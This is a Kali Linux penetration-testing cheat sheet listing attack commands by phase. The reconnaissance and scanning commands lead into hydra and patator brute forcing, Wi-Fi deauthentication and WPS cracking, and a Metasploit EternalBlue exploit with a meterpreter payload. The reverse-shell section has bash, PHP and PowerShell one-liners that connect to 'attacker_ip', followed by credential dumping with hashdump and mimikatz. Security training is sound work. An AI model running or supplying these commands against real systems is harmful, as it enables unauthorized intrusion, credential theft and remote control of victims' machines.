Kali Linux Cheat Sheet (Penetration Testing)

Information Gathering

• nmap -sS -A target.com
• whois target.com
• theharvester -d target.com -b all
• dnsenum target.com
• dirb http://target.com/
• nslookup target.com
• whatweb http://target.com
• recon-ng

Password Attacks

• hydra -l admin -P rockyou.txt target.com http-get
• john --wordlist=rockyou.txt hash.txt
• hashcat -m 0 hash.txt rockyou.txt
• cewl http://target.com -w wordlist.txt
• crunch 6 10 abcdef1234
• medusa -h
• patator ssh_login host=IP user=FILE0 password=FILE1 0=user.txt 1=pass.txt

Wireless Attacks

• airmon-ng start wlan0
• airodump-ng wlan0mon
• aireplay-ng --deauth 10 -a BSSID wlan0mon
• aircrack-ng -w wordlist.txt capture.cap
• wash -i wlan0mon
• reaver -i wlan0mon -b BSSID -vv
• wifite

Vulnerability Scanning

• nikto -h http://target.com
• wpscan --url http://target.com
• sqlmap -u "http://target.com/page.php?id=1" --dbs
• searchsploit apache 2.4
• nuclei -t cves/ -u http://target.com
• openvas-start
• lynis audit system
• gobuster dir -u http://target.com -w wordlist.txt

Exploitation

• msfconsole
• use exploit/windows/smb/ms17_010_eternalblue
• set RHOST target_ip
• set PAYLOAD windows/meterpreter/reverse_tcp
• run
• python3 exploit.py
• search type:exploit platform:windows

System Access & Reverse Shells

• nc -lvnp 4444
• bash -i >& /dev/tcp/attacker_ip/4444 0>&1
• powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);"
• socat TCP4-LISTEN:4444,fork EXEC:/bin/bash
• php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > shell.exe

Post-Exploitation

• meterpreter > getuid
• meterpreter > hashdump
• mimikatz
• netstat -ano
• wmic useraccount list brief
• meterpreter > screenshot
• meterpreter > webcam_snap
• ps